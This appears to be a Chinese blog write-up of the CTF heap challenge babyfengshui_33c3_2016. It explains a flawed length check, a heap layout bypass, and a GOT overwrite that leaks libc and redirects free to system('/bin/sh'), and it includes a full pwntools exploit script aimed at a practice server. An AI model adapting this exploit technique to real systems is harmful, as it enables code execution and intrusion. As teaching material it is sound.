babyfengshui_33c3_2016

最新推荐文章于 2024-01-24 03:30:33 发布
原创 最新推荐文章于 2024-01-24 03:30:33 发布 · 1.4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #python #网络安全 #信息安全 #wp

本文详细解析了如何通过构造连续小堆块并利用错误检查绕过,最终在babyfengshui_33c3_2016的heap题目中实现栈溢出,利用got表进行libc地址泄露,进而执行系统调用。攻击步骤包括申请、释放、修改chunk间距和利用free@got引发代码执行。

babyfengshui_33c3_2016

使用checksec查看:
在这里插入图片描述
开启了Canary和栈不可执行,看题目像是一道heap题目。

放进IDA中查看:

void __cdecl __noreturn main()
{
  char v0; // [esp+3h] [ebp-15h]
  int v1; // [esp+4h] [ebp-14h]
  size_t v2; // [esp+8h] [ebp-10h]
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  alarm(0x14u);
  while ( 1 )
  {
    puts("0: Add a user");
    puts("1: Delete a user");
    puts("2: Display a user");
    puts("3: Update a user description");
    puts("4: Exit");
    printf("Action: ");
    if ( __isoc99_scanf("%d", &v1) == -1 )
      break;
    if ( !v1 )
    {
      printf("size of description: ");
      __isoc99_scanf("%u%c", &v2, &v0);
      sub_8048816(v2);
    }
    if ( v1 == 1 )
    {
      printf("index: ");
      __isoc99_scanf("%d", &v2);
      sub_8048905(v2);
    }
    if ( v1 == 2 )
    {
      printf("index: ");
      __isoc99_scanf("%d", &v2);
      sub_804898F(v2);
    }
    if ( v1 == 3 )
    {
      printf("index: ");
      __isoc99_scanf("%d", &v2);
      sub_8048724(v2);
    }
    if ( v1 == 4 )
    {
      puts("Bye");
      exit(0);
    }
    if ( byte_804B069 > 0x31u )
    {
      puts("maximum capacity exceeded, bye");
      exit(0);
    }
  }
  exit(1);
}

看菜单,堆题,那就一步一步去分析:

首先是sub_8048816(v2)创建chunk:
在这里插入图片描述

  • s = malloc(a1);首先创建用户输入大小的chunk,里面数据置0

  • v2 = malloc(0x80u);接着会创建一个0x80大小的chunk,里面数据置0

  • *v2 = s;第一次申请的chunk的地址放入第二次申请的chunk中

跟进sub_80486BB函数:
在这里插入图片描述

  • 匹配\n :也就是说如果name不为空,将第一次申请的chunk的name存放在*v2+4

跟进sub_8048724
在这里插入图片描述

  • if ( (v3 + *ptr[a1]) >= ptr[a1] - 4 ):v3是由用户输入的,*ptr[a1]实际就是sptr[a1] - 4实际是name的地址,也就是验证chunk1和chunk2之间的距离。

接着看删除函数:
在这里插入图片描述

  • 清空数据,清空指针,没啥毛病

输出函数:
在这里插入图片描述

  • 显示数据,也没啥毛病。

update:
在这里插入图片描述

  • 就是create中的sub_8048724函数。

题目思路:

  • 判断数据长度是否合法的地方有问题,可以通过申请连续小堆块,再释放,接着申请大堆块的方式绕过。

    • 首先申请连续的3个chunk012,本题用0x80,方便计算。
    • 释放第一个结构体,得到一个空闲的0x100的堆块
    • 申请新的结构体,大小为0x100
    • 那么用户新申请的0x100大小的chunk将会在chunk1前面,程序自动申请的0x80大小的chunk将会在chunk2后面
    • 校验写入数据大小是否合法时校验的是这两个chunk之间的距离。
    • 也就是说现在我们可写入的大小是0x100+0x80+0x80+0x80+0x80
    • 修改系统创建的chunk1中存储chunk1地址的位置的数据,修改成free@got造成libc泄露。
    • 在libc中找到system的地址
    • free地址内的内容替换为system
    • 执行free(2)将会执行system(/bin/sh)

    exp:

    from pwn import *

#start 
r = remote("node4.buuoj.cn",29291)
# r = process("../buu/babyfengshui_33c3_2016")
elf = ELF("../buu/babyfengshui_33c3_2016")
libc = ELF("../buu/ubuntu16(32).so")

def add(size,name,length,text):
    r.sendlineafter("Action: ",'0')
    r.sendlineafter("description: ",str(size))
    r.sendlineafter("name: ",name)
    r.sendlineafter("text length: ",str(length))
    r.sendlineafter("text: ",text)

def delete(index):
	r.sendlineafter("Action: ", '1')
	r.sendlineafter("index: ", str(index))

def show(index):
	r.sendlineafter("Action: ", '2')
	r.sendlineafter("index: ", str(index))

def edit(index, length, text):
	r.sendlineafter("Action: ", '3')
	r.sendlineafter("index: ", str(index))
	r.sendlineafter("length: ", str(length))
	r.sendlineafter("text: ", text)

#params
free_got = elf.got['free']

#attack
add(0x80,"M1",0x80,"MMMM")
add(0x80,"M2",0x80,"MMMM")
add(0x80,"M3",0x80,"/bin/sh\x00")
# gdb.attach(r)
delete(0)
payload = b'M'*0x198 + p32(free_got)
add(0x100,"MM1",0x19c,payload)
show(1)
r.recvuntil("description: ")
free_addr = u32(r.recv(4))

#libc
base_addr = free_addr - libc.symbols['free']
system_addr = base_addr + libc.symbols['system']

#attack2
edit(1,0x4,p32(system_addr))
delete(2)

r.interactive()
[BUUCTF]PWN——babyfengshui_33c3_2016
mcmuyanga的博客
01-02 787
babyfengshui_33c3_2016 附件 步骤: 例行检查,32位程序,开启了cannary和nx 本地运行一下看看大概的情况,熟悉的堆的菜单布局 32位ida载入,看main函数 add update delete display 上面看到了update在判断长度的时候存在问题,它的长度判断根据是:以chunk0来说,以chunk0的地址加上chunk0的长度是否等于chunk0name的地址来判断的,但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的
BUUCTF pwn babyfengshui_33c3_2016(简单堆)
菜的只能随便写写博客
02-17 2175
0x01 文件分析   0x02 运行  程序提供了几个简单的功能,增删改查都有。运行的时候程序有定时机制,可以用IDA的patch功能修改二进制指令,消除定时。   0x03 静态分析 主函数: void __cdecl __noreturn main() { char v0; // [esp+3h] [ebp-15h] int v1; // [esp+4h] [ebp-14h] ...
buuctf-babyfengshui_33c3_2016
weixin_48807177的博客
05-04 743
ubuntu16 Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) //没开 基本就这里有点问题 if ( (char *)(v3 + *(_DWORD *)ptr[a1]) >= (char *)ptr[a1] - 4 ) 而重点则是在ed...
buuctf babyfengshui_33c3_2016
weixin_45677731的博客
08-19 485
这是四个主要的函数: add函数: add函数的输入部分: 同时,这也是update函数,其实这个函数是有溢出的漏洞的,它对于长度的检查是有问题的,后面就会利用到这一点 delete函数: display函数: 先随意创建几个chunk,看看布局, add(0x80,"nam1",0x80,"aaaa") add(0x80,"nam2",0x80,"bbbb") add(0x80,"nam3",0x80,"cccc") 以第一个为例,储存text的chunk在前,后面是储存name的chunk,
[BUUCTF]-PWN:babyfengshui_33c3_2016解析
最新发布
2301_79326813的博客
01-24 844
又是一道堆题,先看保护关键信息是32位,没开pie直接看ida大致是alloc创建堆块,free释放堆块,show查看堆块内容,fill填充堆块内容其他的都没啥关键的要讲,但alloc那里非常需要解析一下解释如上图再具体一点就是 我们输入的字节大小+堆块地址>=相邻0x80堆块的地址时会被强制退出必须要 我们输入的字节大小+堆块地址
【CTF】【PWN】胎教向babyfengshui_33c3_2016题解
m0_50819561的博客
10-12 393
跳过checksec,我们直接分析程序。 我这里把这些函数命名为add,delete,display,edit。 先看add。 就是创建两个chunk,一个的地址存放在s里,一个的地址存放在v2里。 然后把s存在v2指向的地址里,用一个名为ptr的数组存放v2。 可以看出来,我们创建了两个chunk。按顺序命名为chunk1和chunk2.我们把这两个chunk看作是一个user的两部分。显然,chunk1存放了user的内容,chunk2存放了user的内容的地址和user的名字。 其中name
pwn33c32016_babyfengshui
Nothing
12-13 308
例行检查 分析程序,注意到在输入内容的时候,输入限制是这样的。 if ( (char *)(v3 + *(_DWORD *)*(&ptr + a1)) >= (char *)*(&ptr + a1) - 4 ) { puts("my l33t defenses cannot be fooled, cya!"); exit(1); ...
babyfengshui_33c3_2016 -- house of spirit
huzai9527的博客
03-17 170
本题主要就是看懂一条判断溢出的if语句 结构体是怎么看出来的 代码上看 struct{ char *text; char name[124]; } 从内存上看 思路 step4 的关于408哪里来的 看内存地址,计算chunk3的content到chunk1的struct即可 exp from pwn import * p = remote('node3.buuoj.cn',29853) #p = process('./babyfengshui_33c3_20
【buu】babyfengshui_33c3_2016(详细题解)
qq_62068476的博客
03-15 562
buu日常一题
babyfengshui_33c3_2016[堆溢出]
、moddemod
06-26 467
未来的你 = 你的热情 + 你的努力 + 那么微不足道的天赋 其实做pwn题我感觉都是只可意会,但并非不可言传,只是说了感觉和说废话一样,没有什么实质性的作用,最最重要的是要自己多去操作调试,pwn多了也就那样吧!但是最核心的永远是你coding的能力!虽然在干着逆向的事,但是coding的能力决定了你的高度! ----小白感悟 这道题问题出现在更新的时候边界的判断方法有问题,结合的堆的机制,就可以形成堆溢出! 添加一个用户会申请两个chunk,后一个chunk的内容为.
babyfengshui_33c3_2016wp
wuyvle的博客
03-05 228
这是个相当好的堆题 add函数 可以看出这是个结构体 struct Node{ char * description; char name[0x7C]; } s便是description的空间地址,而v2则是结构体的空间。 delete函数 display update 这里限制了输入的长度 对于chunk0来说,就是0x80c008+输入长度是否大于0x804c08c,但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的,这样的话就有了实现溢出的可能 add(0x8
babyfengshui_33c3_2016题解
coco的博客
12-09 981
这道题还是比较基础的堆题,泄漏libc和get shell都比较基础。需要注意的是以下几点: 输入长度限制的绕过方法值得学习一下。 泄漏libc时将free got表中写入puts.plt是不可行的,因为这道题的输入结束时候会带上\x00,这样就会破坏free got表的下一项fgets got,导致程序运行失败。 我最后本机上运行成功,但是远程打不通,后来经过发现是因为libc的版本不一样,导...
(攻防世界)(pwnbabyfengshui
PLpa的博客
08-03 1383
入门级的堆题,拿来学习还是不错的。 做这道题之前,最好还是先对堆的数据结构有一定的了解。 拿到题目,下载附件,查看保护。 一个32位的程序,开了NX和Canary保护,这都不是重头戏毕竟这题不用栈,栈保护只是锦上添花罢了。 把文件拖进IDA查看逻辑: 可以看到,典型的菜单题,这很pwn,实现了增删改查四个功能,像极了C语言程序设计的期末结业程序设计题哈哈哈,暴露年龄。 进入增加用户功能: 可...
babyfengshui__BUUCTF
Jc
09-29 658
其实这个题用了两天,第一天拿上题的时候比较浮躁,也没什么分析的效果,把题做出来了,写个文章大家分析交流 我看网上大家都说这个题适合入门堆得看,其实我感觉要是没接触过堆得话,理解起来还是比较困难的,我会将自己做题的思路记录下来,让大家少踩点坑 做题思路 1.查看安全机制/文件信息 2.分析IDA,梳理思路很重要 3.分析构造漏洞利用(其实自己都是一步步来的,毕竟还是个小白呢) 4.编写EXP文件 安...
2021_9_20_name_your_cat
m0_51187558的博客
09-22 344
前言 每日一题的第三题,主要是对于上一道题的一个巩固和补充,涉及到了一点函数执行流的控制,但是总体还是比较简单。 漏洞点分析 在上一道题目里我们遇见了一个溢出数组变量的内存空间的漏洞,一般来说我们称这种类型漏洞为数组越界漏洞(当然,漏洞的俗名只是方便大家归类整理与交流,自己的另起说法也是可行的)。 但是稍微回想一下,上一道题的关键是通过数组越界修改v2变量的值,程序设定好了,只要v2被更改为这个值,我们就能获得flag。 然而在上上道,也就是nc中,我们提到过,想要做出pwn题,需要想方设法使程序执行sys
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2505
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
babyfengshui 堆溢出的入门题
qq_41071646的博客
02-11 1801
本文 参考资料 https://github.com/firmianay/CTF-All-In-One 感谢 作者的 无私奉献 若是侵权 请联系 本人 本人会修改或删除 这道题 其实我也是看这篇文章才撸会的 怎么说呢 这个题 本来 我也是有点迷糊的 补了一些 堆溢出的资料 就懂了许多 这里我是结合资料 来写的 本人也是一个菜虾 要是哪里不对 还请指教 ...
Android FahrPlan应用33C3更新历史回顾
33C3指的是2016年的第33届Chaos Communication Congress,这是一个由Chaos Computer Club组织的年会。Chaos Communication Congress是一个主要聚焦于计算机安全、隐私和匿名性话题的技术大会。 2. FahrPlan应用介绍...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值